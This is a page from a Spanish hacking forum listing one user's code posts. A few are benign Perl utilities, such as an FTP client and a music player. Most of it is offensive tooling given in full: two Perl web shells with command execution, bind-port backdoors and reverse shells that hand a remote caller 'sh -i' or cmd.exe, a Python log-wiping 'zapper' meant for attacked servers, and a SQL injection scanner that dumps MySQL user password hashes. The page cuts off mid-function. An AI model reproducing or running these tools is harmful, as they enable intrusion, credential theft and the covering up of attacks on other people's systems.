Temas - BigBear - Página 10

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - BigBear

Páginas 1 ... 8 9 10

#361

Perl / [Perl] Funcion crazymouse()

Julio 03, 2011, 09:40:43 PM

Hola a todos

Si yo de nuevo con esta nueva funcion crazymouse()
, con esta funcion podran volver loco al mouse sin poder controlarlo
todo por un tiempo elegido por ustedes , muy util si estan por
hacer un virus

Código: perl


#By Doddy H
use Win32::GuiTest qw(MouseMoveAbsPix SendMessage);

sub crazymouse {
for my $number(1..$_[0]) {
MouseMoveAbsPix($number,$number);
} 
}

Ejemplo de uso

Código: perl


crazymouse("666");

#362

Perl / [Perl] Funcion conectar()

Julio 03, 2011, 09:40:26 PM

Hola a todos.

Aca les dejo una funcion para conectarse mediante sockets al servidor que quieran

Código: perl


use IO::Socket;

sub conectar {

my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout  => 5);

print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}

Sintasis

Código: text


conectar(host,puerto,parametro a enviar)

Ejemplo de uso

Código: perl

	
$re = conectar("127.0.0.1","80","GET /sql.php HTTP/1.0\r\n");
print $re;

#363

Perl / [Perl] Funcion cmd()

Julio 03, 2011, 09:40:16 PM

Hola a todos

Acabo de hacer esta funcion cmd() para poder ejecutar comandos
de forma comoda

Código: perl


#By Doddy H

use Win32::Job;

sub cmd {

my $job = Win32::Job->new;
$job->spawn("cmd",qq{cmd /C $_[0]},{
no_window => "true",
stdout => "logx.txt",
stderr => "logx.txt"
}
);
$ok = $job->run("30");

open (F,"logx.txt");
@words = <F>;
close F;

unlink("logx.txt");

return @words;
 
}

Ejemplo de uso

Código: perl


@re = cmd("ver");
print @re;

#364

Perl / [Perl] Funcion cambiar_fondo()

Julio 03, 2011, 09:40:04 PM

Hola a todos

Acabo de hacer un funcion usando las API de Windows para poder
cambiar el fondo de escritorio con solo poner la ruta de la
imagen

Código: perl



#By Doddy H

use Win32::API;

sub cambiar_fondo {

my $a = new Win32::API("user32","SystemParametersInfo", [L,L,P,L],L);
$a->Call(20,0,$_[0],0);

}

Ejemplo de uso

Código: perl


cambiar_fondo("c:/Perl/img.bmp");

#365

Perl / [Perl] FTP Manager

Julio 03, 2011, 09:39:45 PM

Hoy eh terminado este simple cliente FTP el codigo es el siguiente

Código: perl


#!usr/bin/perl
#FTP Manager
#(C) Doddy Hackman 2010

use Net::FTP;

&head;

print "\n\n[FTP Server] : ";
chomp (my $ftp = <stdin>);
print "[User] : ";
chomp (my $user = <stdin>);
print "[Pass] : ";
chomp (my $pass = <stdin>);


if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {

print "\n[+] Enter of the server FTP\n\n";

menu:

print "\n\n>>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/help/) {
print q(

help : show information
cd : change directory <dir>
dir : list a directory 
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory  
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>


);
}

if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}

if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n"; 
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/exit/ig) {
copyright();
exit(1);
}

if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}

goto menu;

} else {
print "\n\n[-] Failed the login\n\n";
}

} else {
print "\n\n[-] Error\n\n";
}

sub head {
print "\n\n -- == FTP Manager == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2010\n\n";
}


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/ftpmanager/

#366

Perl / [Perl] Find paths

Julio 03, 2011, 09:38:44 PM

Un simple scanner para buscar directorios sin index en
la pagina que quieran

Código: perl


#!usr/bin/perl
#Find Paths
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] Sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {

print "\n[+] Find paths in $_[0]\n\n\n";
my @urls = repes(get_links(toma($_[0])));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $_[0].$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
}}}}}}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
print "\n\n-- == Find Paths == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

#367

Perl / [Perl] DH Player

Julio 03, 2011, 09:38:25 PM

Bueno , este es un simple reproductor de musica que hice en perl
En esta version podran tener buscar musica y reproducirla todo en una ventana grosa

Código: perl


#!usr/bin/perl
#DH Player 0.1
#(C) Doddy Hackman 2011

use Tk;
use Win32::MediaPlayer;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}


$test = new Win32::MediaPlayer;

$new = MainWindow->new(-background=>"black");
$new->geometry("350x420+20+20");
$new->resizable(0,0);
$new->title("DH Player 0.1 (C) Doddy Hackman 2011");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Directory : ")->place(-x=>"20",-y=>"20");
my $dir = $new->Entry(-background=>"black",-foreground=>"green",-text=>"C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica")->place(-x=>"100",-y=>"25");
$new->Button(-background=>"black",-foreground=>"green",-activebackground=>"green",-text=>"Search",-width=>"10",-command=>\&buscar)->place(-x=>"240",-y=>"25");
$new->Label(-background=>"black",-foreground=>"green",-text=>"Files Found",-font=>"Impact")->place(-y=>"95",-x=>"120");
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"130",-x=>"100");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Play",-width=>"55",-activebackground=>"green",-command=>\&play)->place(-y=>"310");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Pause",-width=>"55",-activebackground=>"green",-command=>\&pause)->place(-y=>"333");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Resume",-width=>"55",-activebackground=>"green",-command=>\&resume)->place(-y=>"356");	
$new->Button(-background=>"black",-foreground=>"green",-text=>"Stop",-width=>"55",-activebackground=>"green",-command=>\&stop)->place(-y=>"379");	


MainLoop;


sub play {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->load($dir."\\".$cancion);
$test->play;	
}

}

sub stop {
$test->close;
}

sub pause {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->pause;
}

}

sub resume {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->resume;
}

}

sub buscar {

$lists->delete(0.0,"end");

#$dir = "C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica";

my $dir = $dir->get;

opendir DIR,$dir;
	
my @archivos = readdir DIR;

close DIR;

chomp @archivos;

foreach my $file(@archivos) {
if (-f $dir."\\".$file) {
$lists->insert("end",$file);
}
}

}


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/dhplayer/

#368

Perl / [Perl] Commander

Julio 03, 2011, 09:38:14 PM

Bueno este programa es un webserver en perl con la siguientes opciones

* Listar directorios
* Ver archivos
* Borrar directorios y archivos
* ReverseShell
* BindPort

Código: perl


#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2011
#Version 0.1
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use HTML::Entities;
use URI::Escape;
use Win32;
use Net::hostent; 

my $port = rep();

sub rep {
unless($ARGV[0]) {
return int("666"); #Your Can Edit 666
} else {
return int($ARGV[0]);
}
}

print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2011\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";


my $sock = new IO::Socket::INET(
LocalHost => 'localhost',
LocalPort => $port,
Proto     => 'tcp',
Listen    => SOMAXCONN,
Reuse     => 1);


while ($jebus = $sock->accept()) {


print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";
#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
next if $slave=fork;

close $sock;

while ($response = <$jebus>) {

chomp($response);

my %rta;


if ($response=~/GET/ig) {
capturar($response);
}


sub capturar {
my $aa = shift;
chomp $aa;
if ($aa=~/GET \/(.*) HTTP\/1.1/ig) {
my $todo = $1;
if ($todo=~/\?(.*)=(.*)&(.*)=(.*)/ig) {
$rta{$1} = $2;
$rta{$3} = $4;
}
if ($todo=~/\?(.*)=(.*)/ig) {
$rta{$1} = $2;
} 
}


}

print $jebus "

<html><body><title>Commander (C) Doddy Hackman 2011</title>

<style type=text/css>

.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: cyan;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:cyan;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:cyan; 
border: solid 1px cyan;
border-color:cyan
}

a:link,a:visited,a:active {
color: cyan;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>


<h2><center>Commander WebShell</center></h2>

";


if ($rta{'loadfile'}) {

my $file = uri_unescape($rta{'loadfile'});


print $jebus "<br><h2><center>File ".$file."</h2></center><br><br>";

if (-f $file) {

print $jebus "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$file);
@words = <FILE>;
close FILE;

for (@words) {
print $jebus HTML::Entities::encode($_);
}
print $jebus "
</textarea></center>
</center><br><br>
</form>
";

exit(1);
}
}

print $jebus "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print $jebus qx($rta{'cmd'});
}


elsif ($rta{'loadir'}) {
my $dir = uri_unescape($rta{'loadir'});
print "recibi $dir\n\n";
if (-d $dir) {
opendir DIR,$dir;
my @archivos = readdir DIR;
close DIR;

for(@archivos) {

if (-d $_) {
print $jebus "<b>".$_."</b><br>"; 	
} else {
print $jebus $_."<br>";
}}}}

elsif ($rta{'delfile'}) {

my $file = uri_unescape($rta{'delfile'});


if (-f $file) {

if (unlink($file)) {
print $jebus "<script>alert('File Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'deldir'}) {

my $dir = uri_unescape($rta{'deldir'});

if (-d $dir) {
if (rmdir($dir)) {
print $jebus "<script>alert('Directory Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'ipconnect'}) {
print $rta{'ipconnect'}."\n";
print $rta{'port'}."\n";
conectar($rta{'ipconnect'},$rta{'port'});
tipo();

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}
}

elsif($rta{'portbind'}) {

$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => $rta{'portbind'},
Listen    => SOMAXC,
Reuse     => 1);


while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

sub extras {

if ($^O =~//ig) {
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print $jebus "<b>".$_."</b><br>"; 	
} else {
print $jebus $_."<br>";
}}

}

print $jebus "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>

<b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>


</body></html>
";

$jebus->close;
	
}
		
} continue {
$jebus->close;
}

# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/commanderx/

#369

Perl / [Perl] CGI Shell

Julio 03, 2011, 09:38:00 PM

Hola a todos

Hoy eh terminado de hacer un shell en cgi , estas shells se usan en las paginas que pemiten ejecutar archivos cgi y tienen el directorio cgi-bin

Esta shell tiene las sig opciones

* Listar directorios
* Ver y editar archivos
* Eliminar archivos y directorios
* ReverseShell
* Subir archivos a un directorio especificado
* Ejecutar comandos
* Enviar mails

Código: perl


#!"\xampp\perl\bin\perl.exe"
#
#CGI Shell 0.1
#
#(C) Doddy Hackman 2011
#
#

use CGI;
use Cwd;
use HTML::Entities;
use Net::SMTP;

my %rta;

my $que = new CGI;
my @ques = $que->param;

for(@ques) {
$rta{$_} = $que->param($_);
}


print "Content-type:text/html\n\n";
print "

<style type=text/css>


.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: #00FF00;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00; 
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

<title>CGI Shell (C) Doddy Hackman 2011</title>
<h2><center>CGI Shell</center></h2>

";

if ($rta{'filex'}) {

open FILE ,">>".$rta{'todir'}."/".$rta{'filex'}; 
while($bytes = read($rta{'filex'},$todo, 1024)) {
print FILE $todo;
}
close FILE;

print "<script>alert('File Uploaded');</script>";

}

if ($rta{'codefile'}) {

unlink($rta{'filecode'});

open (FILE,">>".$rta{'filecode'});
print FILE $rta{'codefile'}."\n";
close FILE;

print "<script>alert('File Changed');</script>";

}

if ($rta{'loadfile'}) {
print "<form action='' method=POST>";
print "<br><h2><center>File ".$rta{'loadfile'}."</h2></center><br><br>";

if (-f $rta{'loadfile'}) {

print "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$rta{'loadfile'});
@words = <FILE>;
close FILE;

for (@words) {
print HTML::Entities::encode($_);
}
print "
</textarea></center>
<input type=hidden name=filecode value=".$rta{'loadfile'}.">
<br><br><center><input type=submit value=Save></center><br><br>
</form>
";

exit(1);
}
}

print "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print qx($rta{'cmd'});
}

elsif ($rta{'mail'}) {

my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or die("[-] Error");
$send->mail($rta{'mail'});
$send->to($rta{'to'});   
$send->data(); 
$send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n"); 
$send->dataend(); 
$send->quit();

}


elsif ($rta{'loadir'}) {

if (-d $rta{'loadir'}) {

opendir DIR,$rta{'loadir'};
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>"; 	
} else {
print $_."<br>";
}}}}

elsif (-f $rta{'delfile'}) {
if (unlink($rta{'delfile'})) {
print "<script>alert('File Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif (-d $rta{'deldir'}) {
if (rmdir($rta{'deldir'})) {
print "<script>alert('Directory Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif ($rta{'ipconnect'}) {

$code = '
#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) { 
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End
';

if ($^O =~/Win32/ig) { 
open (FILE,">>"."back.pl");
chmod("back.pl","777");
} else {
open (FILE,">>"."/tmp/back.pl");
chmod("/tmp/back.pl","777");
}

print FILE $code;
close FILE;

if ($^O == "MSWin32") { 
system("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
} else {
system("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>"; 	
} else {
print $_."<br>";
}}

}

print "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<form enctype='multipart/form-data' method=POST>
<br><b>Upload File</b> : <input type=file name=filex><br><br>
<b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br>
<input type=submit value=Upload>
</form>
<br><B>Mailer</b><br><br>
<form action='' method=GET>
<b>Mail</b> : <input type=text name=mail><br>
<b>To</b> : <input type=text name=to><br>
<b>Subject</B> : <input type=text name=subject><br>
<B>Body</B> : <input type=text name=body><br><br>
<input type=submit value=Send>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>IP</B> : <input type=text name=ipconnect><br>
<b>Port</B> : <input type=text name=port><br>
<br><input type=submit value=Connect></form><br><br>

";


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/cgishellx/

#370

Python / [Python] Zapper By Doddy H

Julio 03, 2011, 09:37:08 PM

Hola a todos.

Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza
a borrar huellas.
Eso si , no me habia dado cuenta de que facil usar python xDD

Código: python


#!usr/bin/python
#Zapper (C) Doddy Hackman

import os

paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"]

comandos  = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST']

print "\n[+] Starting the zapper"

for path in paths :
 try :
  os.delete(path)
 except :
  pass

for cmd in comandos :
 try:
  os.system(cmd)
 except:
  pass

print "[+] All logs are erased\n"

#The End ?

#371

Python / [Python] SQL Scanner 0.3

Julio 03, 2011, 09:36:57 PM

Bueno este es un simple scanner en python que hice para SQLI

Con las sig opciones :

Verifica vulnerabilidad
Busca columnas
Busca el numero milagroso y saca info sobre la DB
Saca tablas y columnas de de la DB actual o otra externa
Dumpear usuarios

Guarda todo en un log con el nombre de la web en la carpeta /logs

Código: python


#!usr/bin/python
#SQL Scanner 0.3 (C) Doddy Hackman 2010

import os,sys,urllib2,re,binascii
from urlparse import urlparse

def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")

def savefile(name,text):
 file = open(name,"a")
 file.write("\n"+text+"\n")
 file.close()

def gethost(test):
 return urlparse(test).netloc

def header() : 
 print "\n--== SQL Scanner ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 sys.exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()

def bypass(bypass): 
 if bypass == "--":
  return("+","--")
 elif bypass == "/*":
  return("/**/","/*")
 else: 
  return("+","--")


def dumper(web,passx,table,col1,col2):

 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
 code1 = toma(web1+pass1+"from"+pass1+table+pass2)
 print "\n\n[+] Searching values\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] Values Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)	
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
    c1 = c1[0]

    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
    c2 = c2[0]
    print "["+col1+"] : "+c1
    print "["+col2+"] : "+c2+"\n"
    savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
    savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
 else:
  print "[-] Not Found\n"



def mysqluser(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 print "\n\n[+] Searching mysql.user\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] mysql.user : ON"
  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  print "[+] Users Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    host = re.findall("K0BRA(.*?)K0BRA",code2)
    host = host[0]

    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
    user = user[0]
 
    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
    passw = passw[0]
    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
    print "[Host] : "+host
    print "[User] : "+user
    print "[Pass] : "+passw+"\n"    
 else:
  print "[-] Not Found\n" 
 


def showcolumnsdb(web,db,table,passx):
 db = "0x"+str(binascii.hexlify(db))
 table = "0x"+str(binascii.hexlify(table))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching columns in DB\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
